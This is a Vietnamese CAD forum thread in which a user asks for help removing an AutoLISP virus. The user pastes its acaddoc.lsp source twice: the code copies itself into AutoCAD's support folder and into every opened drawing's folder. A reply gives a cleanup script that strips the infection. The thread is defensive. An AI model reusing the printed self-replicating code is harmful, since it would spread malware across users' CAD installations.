Đến nội dung


Hình ảnh
5 stars - based on 24598 reviews

Giúp diệt sâu (virus) tự vạo file acaddoc.lsp và làm chậm Cad.


 • Please log in to reply
9 replies to this topic

#1 khoak47

khoak47

  biết pan

 • Members
 • Pip
 • 9 Bài viết
Điểm đánh giá: 1 (bình thường)

Đã gửi 23 July 2014 - 04:51 PM

Như tiêu đề, khi em mở 1 file cad bất kỳ thì có 1 file acaddoc.lsp được tạo ra ngay trong thư mục chứa file cad đc mở kia.

Mở 1 hay nhiều file cad trong cùng folder thì chỉ 1 acaddoc.lsp được tạo ra thôi. Nhiều lúc em dùng lệnh audit rồi lưu lại thì file đó không bị như trên nữa, nhưng hên xui lúc được lúc không. File  acaddoc.lsp dưới đây ạ.http://www.cadviet.c...145_acaddoc.lsp

Rất mong các a chị xử lý giúp e với. Em xin chân thành cảm ơn.

(/ basepath
   baseacad
   acaddocpath
   r-acaddoc
   w-basepath
   acaddoclsp
   c-acaddocname
   c-acaddocpath
   c-acaddoc
  )
     (setq basepath
   (findfile "base.dcl")
     )
     (setq basepath
   (substr basepath
   1 (- (strlen basepath) 8)
            )
     )
     (setq baseacad (strcat basepath "acaddoc.lsp"))
  
(setq acaddocpath
               (findfile "acaddoc.lsp")
)
(setq acaddocpath
      (substr acaddocpath
      1 (- (strlen acaddocpath) 11)
      )
)
(setq acaddoclsp
      (strcat acaddocpath "acaddoc.lsp"))
 
 
        (setq c-acaddocname
      (getvar "dwgname")
)
        (setq c-acaddocpath
      (findfile c-acaddocname)
)
        (setq c-acaddocpath
      (substr c-acaddocpath
      1 (- (strlen c-acaddocpath) (strlen c-acaddocname))
)
)
        (setq c-acaddoc
      (strcat c-acaddocpath "acaddoc.lsp")
)
(if
           (and
  (/= basepath acaddocpath)
  (= c-acaddocpath acaddocpath)
  )
    (progn
      (setq r-acaddoc
      (open acaddoclsp "r")
      )
      (setq w-basepath
         (open baseacad "w")
)     
      (while
          (setq rl-acaddoc
   (read-line r-acaddoc)
          )
          (write-line rl-acaddoc w-basepath)
       )
       (close w-basepath)   
                (close r-acaddoc)
   
             )
         
    (progn
      (setq r-acaddoc
      (open acaddoclsp "r")
      )
      (setq w-basepath
         (open c-acaddoc "w")
)
       (while
          (setq rl-acaddoc
   (read-line r-acaddoc)
          )
          (write-line rl-acaddoc w-basepath)
       )
       (close w-basepath)   
                (close r-acaddoc)
   
             )
)
)
(/ basepath
   baseacad
   acaddocpath
   r-acaddoc
   w-basepath
   acaddoclsp
   c-acaddocname
   c-acaddocpath
   c-acaddoc
  )
     (setq basepath
   (findfile "base.dcl")
     )
     (setq basepath
   (substr basepath
   1 (- (strlen basepath) 8)
            )
     )
     (setq baseacad (strcat basepath "acaddoc.lsp"))
  
(setq acaddocpath
               (findfile "acaddoc.lsp")
)
(setq acaddocpath
      (substr acaddocpath
      1 (- (strlen acaddocpath) 11)
      )
)
(setq acaddoclsp
      (strcat acaddocpath "acaddoc.lsp"))
 
 
        (setq c-acaddocname
      (getvar "dwgname")
)
        (setq c-acaddocpath
      (findfile c-acaddocname)
)
        (setq c-acaddocpath
      (substr c-acaddocpath
      1 (- (strlen c-acaddocpath) (strlen c-acaddocname))
)
)
        (setq c-acaddoc
      (strcat c-acaddocpath "acaddoc.lsp")
)
(if
           (and
  (/= basepath acaddocpath)
  (= c-acaddocpath acaddocpath)
  )
    (progn
      (setq r-acaddoc
      (open acaddoclsp "r")
      )
      (setq w-basepath
         (open baseacad "w")
)     
      (while
          (setq rl-acaddoc
   (read-line r-acaddoc)
          )
          (write-line rl-acaddoc w-basepath)
       )
       (close w-basepath)   
                (close r-acaddoc)
   
             )
         
    (progn
      (setq r-acaddoc
      (open acaddoclsp "r")
      )
      (setq w-basepath
         (open c-acaddoc "w")
)
       (while
          (setq rl-acaddoc
   (read-line r-acaddoc)
          )
          (write-line rl-acaddoc w-basepath)
       )
       (close w-basepath)   
                (close r-acaddoc)
   
             )
)
)

 • 0

#2 Doan Van Ha

Doan Van Ha

  biết lệnh adcenter

 • CADViet Team
 • PipPipPipPipPipPipPip
 • 5543 Bài viết
Điểm đánh giá: 2669 (tuyệt vời)

Đã gửi 23 July 2014 - 04:55 PM

Tìm đọc về lisp diệt virus cad trên forum này nhé bạn!


 • 1

* Chỉ nên yêu cầu Lisp khi bạn làm việc đó mất cả ngày nhưng họ chỉ viết 1 giờ. Và đừng làm điều ngược lại.

* Nhờ viết lisp cũng như đi khám bệnh. Chỉ gởi căn cước và than sắp chết thì không bác sỹ nào cứu sống được.


#3 khoak47

khoak47

  biết pan

 • Members
 • Pip
 • 9 Bài viết
Điểm đánh giá: 1 (bình thường)

Đã gửi 24 July 2014 - 08:29 AM

Tìm đọc về lisp diệt virus cad trên forum này nhé bạn!

 

Thank bác Ha. e cũng tìm hiểu cả tuần nay trên 4room mình rồi mà vẫn chưa có kết quả khả quan.:(


 • 0

#4 Doan Van Ha

Doan Van Ha

  biết lệnh adcenter

 • CADViet Team
 • PipPipPipPipPipPipPip
 • 5543 Bài viết
Điểm đánh giá: 2669 (tuyệt vời)

Đã gửi 24 July 2014 - 08:38 AM

Tìm ở đây chưa?

http://www.cadviet.c...viet-antivirus/


 • 0

* Chỉ nên yêu cầu Lisp khi bạn làm việc đó mất cả ngày nhưng họ chỉ viết 1 giờ. Và đừng làm điều ngược lại.

* Nhờ viết lisp cũng như đi khám bệnh. Chỉ gởi căn cước và than sắp chết thì không bác sỹ nào cứu sống được.


#5 pphung183

pphung183

  biết dimstyle

 • Members
 • PipPipPipPipPip
 • 385 Bài viết
Điểm đánh giá: 426 (tốt)

Đã gửi 24 July 2014 - 10:04 AM

bạn thử xài cái này

http://www.cadviet.c...addocfix_18.rar

Lệnh  Ap rồi cho vào hộp Content  để chạy thường trực :)


 • 4

#6 phamhung12

phamhung12

  biết vẽ ellipse

 • Members
 • PipPip
 • 59 Bài viết
Điểm đánh giá: 1 (bình thường)

Đã gửi 24 July 2014 - 10:40 AM

Mình đang cần chương trình này. Thanks!


 • 0

#7 khoak47

khoak47

  biết pan

 • Members
 • Pip
 • 9 Bài viết
Điểm đánh giá: 1 (bình thường)

Đã gửi 31 July 2014 - 09:56 AM

thank bác pphung183 đã chia sẻ, nhưng cái kaspersky của e nó chặn ko cho download.bác viết đoạn code lên e copy về đc ko ạ.


 • 0

#8 pphung183

pphung183

  biết dimstyle

 • Members
 • PipPipPipPipPip
 • 385 Bài viết
Điểm đánh giá: 426 (tốt)

Đã gửi 31 July 2014 - 01:00 PM

;;; ==========================================================================
;;; acaddocfix written by metinsaylan -> metinsaylan.com
;;; ==========================================================================

(setq flagx t) ; This is the virus flag to stop virus overwriting this file
(setq bz "(setq flagx t)") ; This is for searching virus

(defun clearfile (target bz / flag flag1 wjm wjm1 text)

 (setq flag nil)
 (setq flag1 nil)

 (princ (strcat "\nClearfile -> " target))

 (if (findfile target)			;if file exists
  (progn
   (setq wjm1 (open target "r"))

   (while (setq text (read-line wjm1))
	(if (= text bz)
	 (setq flag1 t)
	)
   )					;while

   (close wjm1)
  )					;progn
 )					;if

 (if flag1				;virus found!
  (progn

   (princ (strcat "\nVirus found -> " target))

   (setq flag t)
   (setq wjm (open target "r"))
   (setq wjm1 (open "temp.lsp" "w"))

   (while (setq text (read-line wjm))

	(if (= text bz)
	 (setq flag nil)
	)

	(if flag
	 (progn
	  (write-line text wjm1)
	 )				;progn
	)				;if
   )					;while

   (close wjm1)
   (close wjm)

   (setq wjm (open "temp.lsp" "r"))
   (setq wjm1 (open target "w"))

   (while (setq text (read-line wjm))
		(write-line text wjm1)
   );while
   (close wjm1)
   (close wjm)

   (vl-file-delete "temp.lsp")
  );progn
  ;(princ (strcat "\nClean file: " target))
 )					;if
 
 
)					;defun


; Generating file lists
(setq acadmnl (findfile "acad.mnl"))
(setq acadmnlpath (vl-filename-directory acadmnl))
(setq mnlfilelist (vl-directory-files acadmnlpath "*.mnl" 1))
(setq mnlnum (vl-list-length (vl-directory-files acadmnlpath "*.mnl" 1)))

(setq acadexe (findfile "acad.exe"))
(setq acadpath (vl-filename-directory acadexe))
(setq support (strcat acadpath "\\support"))
(setq acaddoc (strcat support "\\acaddoc.lsp"))

(setq lspfilelist (vl-directory-files support "*.lsp"))
(setq lspfilelist (append lspfilelist (list "acaddoc.lsp")))
(setq lspnum (length lspfilelist))
(setq dwgname (getvar "dwgname"))

; Check for open drawing file folder
(if (setq dwgpath (findfile dwgname)) ; if a file is open
 (progn
  (setq acaddoclocal
	  (strcat (vl-filename-directory dwgpath)
		  "\\acaddoc.lsp"
	  )
  )
  (clearfile acaddoclocal bz)
 )
)

(clearfile acaddoc bz)

;;; Clear MNL files
(setq mnln 0)
(while (< mnln mnlnum)
 (setq mnlfilename (strcat acadmnlpath "\\" (nth mnln mnlfilelist)))
 (clearfile mnlfilename bz)
 (setq mnln (1+ mnln))
);while

;;; Clear LSP files
(setq lspn 0)
(while (< lspn lspnum)
	(setq lspfilename (strcat support "\\" (nth lspn lspfilelist)))
	(clearfile lspfilename bz)
	(setq lspn (1+ lspn))
);while

;;; Clear other lisp files
(if (findfile "acad2013doc.lsp")
	(progn
		(setq acad2013doc (findfile "acad2013doc.lsp"))
		(clearfile acad2013doc bz)
	)
)

(if (findfile "acad2012doc.lsp")
	(progn
		(setq acad2012doc (findfile "acad2012doc.lsp"))
		(clearfile acad2012doc bz)
	)
)

(if (findfile "acad2011doc.lsp")
	(progn
		(setq acad2011doc (findfile "acad2011doc.lsp"))
		(clearfile acad2011doc bz)
	)
)

(if (findfile "acad2010doc.lsp")
	(progn
		(setq acad2010doc (findfile "acad2010doc.lsp"))
		(clearfile acad2010doc bz)
	)
)

(if (findfile "acad2009doc.lsp")
	(progn
		(setq acad2009doc (findfile "acad2009doc.lsp"))
		(clearfile acad2009doc bz)
	)
)

(if (findfile "acad2007doc.lsp")
	(progn
		(setq acad2007doc (findfile "acad2007doc.lsp"))
		(clearfile acad2007doc bz)
	)
)

Đây bạn!


 • 4

#9 khoak47

khoak47

  biết pan

 • Members
 • Pip
 • 9 Bài viết
Điểm đánh giá: 1 (bình thường)

Đã gửi 08 August 2014 - 09:15 AM

Xin chân thành cảm ơn bác pphung183 và mọi người, sau khi kết hợp thêm 2 lisp trên 4room mình là cadviet antivirus v1.01+cadviet antivirus v1.04 thì máy e đã sạch sẽ con virus kia ạ :D


 • 0

#10 hoangdu015

hoangdu015

  Chưa sử dụng CAD

 • Members
 • Pip
 • 3 Bài viết
Điểm đánh giá: 0 (bình thường)

Đã gửi 09 May 2015 - 11:12 AM

rất hữu ích


 • 0